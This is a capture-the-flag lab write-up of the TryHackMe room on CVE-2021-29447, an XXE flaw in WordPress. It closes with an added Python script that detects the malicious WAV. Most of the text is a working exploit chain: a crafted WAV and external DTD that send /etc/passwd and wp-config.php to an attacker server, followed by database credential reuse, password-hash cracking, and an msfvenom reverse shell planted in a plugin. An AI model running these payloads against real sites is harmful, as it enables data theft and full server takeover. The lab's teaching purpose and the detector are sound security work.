# CVE-2021-29447 (WordPress 5.7 XXE vulnerability)

###### tags: `CVE` `TryHackMe` `XXE`

Room:
```
https://tryhackme.com/room/wordpresscve202129447
```

Reference:
```
https://www.ddosi.org/cve-2021-29447/
```

Connect to the VPN:
```
sudo openvpn cow3345678cow.ovpn
```
```
ifconfig
```

Get the VPN IP:
```
10.18.10.74
```

Click Start Machine; it gives you the target website's IP:
```
10.10.15.78
```

Firefox:
```
http://10.10.15.78/
```

wpscan:
```
sudo wpscan --url http://10.10.15.78 --enumerate ap,at,cb,dbe
```

WordPress version:
```
WordPress version 5.6.2 identified (Insecure, released on 2021-02-22)
```

WordPress login page:
```
http://10.10.15.78/wp-login.php
```

Enter the credentials (given by the room):
```
user: test-corp
password: test
```

At this point we are an ordinary user.

## Exploiting the vulnerability

Create payload.wav; change the IP, port and DTD file name to your own:
```bash
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://10.18.10.74:80/poc.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
```

Create poc.dtd; change the IP and port to your own:
```dtd
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://10.18.10.74:80/?p=%file;'>" >
```

Payload explanation:
```dtd
<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % remote SYSTEM 'http://10.18.10.74:80/poc.dtd'>  <!-- declares the parameter entity remote; this is only allowed inside the DOCTYPE declaration -->
%remote;  <!-- referencing remote makes the parser fetch the external DTD -->
%init;    <!-- referencing init is equivalent to declaring the trick parameter entity -->
%trick;   <!-- referencing trick sends the password file data out to the external server's log -->
]>
```

External DTD:
```dtd
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!-- declares the parameter entity file, which reads the password file -->
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://10.18.10.74:80/?p=%file;'>" >
<!-- declares the parameter entity init as the string "<!ENTITY &#x25; trick SYSTEM 'http://10.18.10.74:80/?p=%file;'>";
     because %file; is expanded at the same time, this is equivalent to
     "<!ENTITY &#x25; trick SYSTEM 'http://10.18.10.74:80/?p=<password file data>'>" -->
```

Start a web server on the desktop so the victim server can reach the DTD file:
```
php -S 0.0.0.0:80
```

Upload payload.wav. When the server parses payload.wav it fetches the DTD, and the DTD in turn reads:
```
/etc/passwd
```

Once it has the content, it carries it back in the `p` parameter (check the PHP server log):
```
[Fri Oct 21 10:24:43 2022] 10.10.15.78:48502 [404]: GET /?p=<base64 data omitted> - No such file or directory
```

Create decoder.php (decodes with the zlib library; paste the base64 from above). The data I received sometimes had output problems, so it may be necessary to strip the whitespace first and then decode:
```php
<?php
echo zlib_decode(base64_decode('base64here'));
?>
```

Run:
```
php decoder.php
```

Result:
```
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
stux:x:1000:1000:CVE-2021-29447,,,:/home/stux:/bin/bash
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:109:117:MySQL Server,,,:/nonexistent:/bin/false
```

At this point /etc/passwd is readable. Next, change the DTD to dump wp-config.php instead:
```xml
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=../wp-config.php">
```

Re-upload payload.wav, and the log shows:
```
[Fri Oct 21 11:00:47 2022] 10.10.15.78:48510 [404]: GET /?p=<base64 data omitted> - No such file or directory
```

Decoded:
```php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpressdb2' );

/** MySQL database username */
define( 'DB_USER', 'thedarktangent' );

/** MySQL database password */
define( 'DB_PASSWORD', 'sUp3rS3cret132' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         'put your unique phrase here' );
define( 'SECURE_AUTH_KEY',  'put your unique phrase here' );
define( 'LOGGED_IN_KEY',    'put your unique phrase here' );
define( 'NONCE_KEY',        'put your unique phrase here' );
define( 'AUTH_SALT',        'put your unique phrase here' );
define( 'SECURE_AUTH_SALT', 'put your unique phrase here' );
define( 'LOGGED_IN_SALT',   'put your unique phrase here' );
define( 'NONCE_SALT',       'put your unique phrase here' );

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wptry_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://wordpress.org/support/article/debugging-in-wordpress/
 */
define( 'WP_DEBUG', false );

/* That's all, stop editing! Happy publishing. */

define('WP_HOME', false);
define('WP_SITEURL', false);

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
```

This gives us the DB username. Scan with nmap:
```
sudo nmap -p 3306 10.10.107.98
```

Connect with mysql:
```
mysql -h 10.10.107.98 -u thedarktangent -p
```

Password:
```
sUp3rS3cret132
```

List the databases:
```
show databases;
```

Select the database:
```
use wordpressdb2;
```

List the tables:
```
show tables;
```

User table:
```
select * FROM wptry_users;
```

Two users:
```
corp-001  | $P$B4fu6XVPkSU5KcKUsP1sD3Ul7G3oae1
test-corp | $P$Bk3Zzr8rb.5dimh99TRE1krX8X85eR0
```

hash-identifier:
```
hash: $P$B4fu6XVPkSU5KcKUsP1sD3Ul7G3oae1
```

Create hash_wps.txt:
```
$P$B4fu6XVPkSU5KcKUsP1sD3Ul7G3oae1
```

Decompress rockyou.txt:
```
sudo gzip -d /usr/share/wordlists/rockyou.txt.gz
```

john:
```
john hash_wps.txt --wordlist=/usr/share/wordlists/rockyou.txt
```
```
john --show hash_wps.txt
```

Password:
```
teddybear
```

Log in as the administrator:
```
user: corp-001
passwd: teddybear
```

Generate a PHP reverse shell with msfvenom:
```
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.1.195 LPORT=4444 > reverse.php
```

Listen with msfconsole:
```
use exploit/multi/handler
set LHOST 10.10.1.195
set LPORT 4444
set PAYLOAD php/meterpreter/reverse_tcp
exploit
```

Find the plugins section, open the Hello Dolly page and overwrite hello.php with the contents of reverse.php, then save. (Remember to deactivate the plugin before editing it.)

Plugin editor page:
```
http://10.10.1.195/wp-admin/plugin-editor.php?plugin=hello.php&Submit=Select
```

Browse to the URL to trigger it and get the shell:
```
http://10.10.243.74/wp-content/plugins/hello.php
```

Interactive shell (find the flag):
```
ls
cd home
cd stux
cd flag
cat flag.txt
```
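As an added defensive example (not part of the original writeup), the Python script below walks the RIFF chunks of a WAV file and flags an iXML chunk that carries a DOCTYPE, an external SYSTEM/PUBLIC entity declaration or a parameter-entity reference, which is exactly the shape of the payload.wav built above; an upload handler or a file scanner could run this check before handing the file to a metadata parser. Both sample files are constructed inline, and `attacker.invalid` is a placeholder host.

```python
import re
import struct

def build_wav(ixml_payload: bytes) -> bytes:
    """Minimal RIFF/WAVE container with a single iXML chunk (constructed sample, same layout as payload.wav)."""
    chunk = b"iXML" + struct.pack("<I", len(ixml_payload)) + ixml_payload
    if len(ixml_payload) % 2:          # RIFF chunks are padded to an even length
        chunk += b"\x00"
    body = b"WAVE" + chunk
    return b"RIFF" + struct.pack("<I", len(body)) + body

def riff_chunks(data: bytes):
    """Yield (fourcc, payload) for every sub-chunk of a RIFF/WAVE file."""
    if data[:4] != b"RIFF" or data[8:12] != b"WAVE":
        return
    pos = 12
    while pos + 8 <= len(data):
        fourcc = data[pos:pos + 4]
        (size,) = struct.unpack("<I", data[pos + 4:pos + 8])
        yield fourcc, data[pos + 8:pos + 8 + size]
        pos += 8 + size + (size & 1)   # skip the pad byte after odd-sized chunks

# Markers of a DTD that can pull in external content or expand parameter entities.
DOCTYPE = re.compile(rb"<!DOCTYPE", re.I)
EXTERNAL = re.compile(rb"<!ENTITY\s+%?\s*\w+\s+(?:SYSTEM|PUBLIC)\b", re.I)
PARAM_REF = re.compile(rb"%\w+;")

def xxe_indicators(wav: bytes) -> list:
    """Return the XXE indicators found in the iXML chunk(s); an empty list means no DTD constructs."""
    findings = []
    for fourcc, payload in riff_chunks(wav):
        if fourcc != b"iXML":
            continue
        if DOCTYPE.search(payload):
            findings.append("DOCTYPE declaration in iXML chunk")
        if EXTERNAL.search(payload):
            findings.append("external (SYSTEM/PUBLIC) entity declaration")
        if PARAM_REF.search(payload):
            findings.append("parameter entity reference")
    return findings

# Constructed samples: ordinary iXML metadata vs. the DOCTYPE shape used by payload.wav.
BENIGN = build_wav(b'<?xml version="1.0"?><BWFXML><PROJECT>demo</PROJECT></BWFXML>')
SUSPECT = build_wav(b'<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '
                    b'"http://attacker.invalid/poc.dtd">%remote;]>')

if __name__ == "__main__":
    print("benign :", xxe_indicators(BENIGN))    # []
    print("suspect:", xxe_indicators(SUSPECT))   # three findings
```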